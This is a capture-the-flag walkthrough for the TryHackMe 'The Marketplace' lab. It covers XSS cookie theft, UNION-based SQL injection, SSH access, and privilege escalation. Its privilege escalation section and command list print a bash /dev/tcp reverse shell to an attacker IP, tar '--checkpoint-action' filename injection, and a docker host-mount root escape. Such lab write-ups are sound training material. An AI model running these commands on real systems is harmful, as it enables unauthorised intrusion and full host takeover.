Summary

In this video walk-through, we demonstrated gaining root access to a docker container running a web server with an SQL database. We started off by exploiting a reflected XSS vulnerability in the website that is running an e-commerce marketplace. This enabled us to proceed and gain administrative access to the admin account where we discovered an SQL injection that let us go further and reveal the database records. We used the records to login as SSH and perform privilege escalation by exploiting the wild card in the archiving tool tar which eventually landed us in a docker container. By mounting the root file system to a container of our choice, we were able to extract the root flag.

This post covers the answers for The Marketplace room in TryHackMe.

Initial Reconnaissance & Web Exploitation

I started with an Nmap scan which revealed several open ports: SSH (234), HTTP (80), and another web server on port 32768 running Node.js. The Nmap scan also helpfully discovered an /admin directory via robots.txt.

The website itself had typical e-commerce features like login, sign-up, and product listings. I quickly identified the “New Listing” feature as a potential attack vector. After some testing, I found the site was vulnerable to reflected Cross-Site Scripting (XSS).

I crafted a cookie-stealing XSS payload to capture the admin’s cookie when they reviewed a reported listing. My payload was successfully executed, and I captured the admin’s cookie. Using this cookie, I hijacked their session, gaining access to the /admin page and securing the first flag.

Database Exploitation (SQL Injection)

Within the admin area, I saw user details, and the URL parameters (e.g., user=ID) immediately struck me as potential SQL injection points.

I systematically explored the database:

  • I determined the number of columns using UNION SELECT.
  • I retrieved database names, including Marketplace and information_schema.
  • I dumped table names within the Marketplace database, finding items, messages, and users.
  • I retrieved column names within the users table: ID, is_administrator, password, and username.
  • I then dumped usernames and password hashes from the users table.

Instead of cracking the hashes, I inspected the messages table. A message there revealed a temporary SSH password for a user. I used this password to log in as the user “Jake” via SSH, which gave me the user flag.

Privilege Escalation

Once I was in as Jake, I checked his sudo privileges:

  • sudo -l

This showed that Jake could run a backup.sh script as the user “Michael” without a password. I viewed the script’s content:

  • cat /opt/backup.sh

I noticed the backup.sh script used tar with a wildcard (*), which is a known vulnerability! I created a malicious shell script (shell.sh) containing a netcat reverse shell:

  • echo 'bash -i >& /dev/tcp/<YOUR_IP>/4545 0>&1' > shell.sh
  • chmod +x shell.sh

I then exploited the tar wildcard vulnerability by creating files that would instruct tar to execute my shell.sh script during the backup process:

  • echo "" > "--checkpoint-action=exec=sh shell.sh"
  • echo "" > "--checkpoint=1"

On my machine, I set up a Netcat listener:

  • nc -lvnp 4545

Then, I ran the backup.sh script as Michael:

  • sudo -u michael /opt/backup.sh

This triggered the reverse shell, granting me access as Michael. I quickly checked Michael’s groups and found he was part of the docker group. This was a significant finding!

I listed the Docker images:

  • docker images

Finally, I exploited the Docker group membership to gain root access to the host system. I ran a Docker container (Alpine) and mounted the host’s entire file system to /mnt inside the container:

  • docker run -v /:/mnt --rm -it alpine chroot /mnt sh

This effectively gave me a root shell on the host system. I navigated to the /root directory and retrieved the root flag.

Technical Commands Used:

  • python -m http.server (or python -m SimpleHTTPServer for Python 2)
  • echo <base64_string> | base64 -d
  • SQL Injection Payloads (conceptual, for UNION SELECT, information_schema.schemata, information_schema.tables, information_schema.columns, and dumping user data)
  • ssh jake@<IP_ADDRESS>
  • sudo -l
  • cat /opt/backup.sh
  • echo 'bash -i >& /dev/tcp/<YOUR_IP>/4545 0>&1' > shell.sh
  • echo "" > "--checkpoint-action=exec=sh shell.sh"
  • echo "" > "--checkpoint=1"
  • chmod +x shell.sh
  • sudo -u michael /opt/backup.sh
  • nc -lvnp 4545
  • docker images
  • docker run -v /:/mnt --rm -it alpine chroot /mnt sh
  • id
  • ls
  • cd /root
  • cat user.txt
  • cat root.txt

TryHackMe The Marketplace Answers

 
What is flag 1?
 

What is flag 2? (User.txt)

 

What is flag 3? (Root.txt)

 

Video Walk-through

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles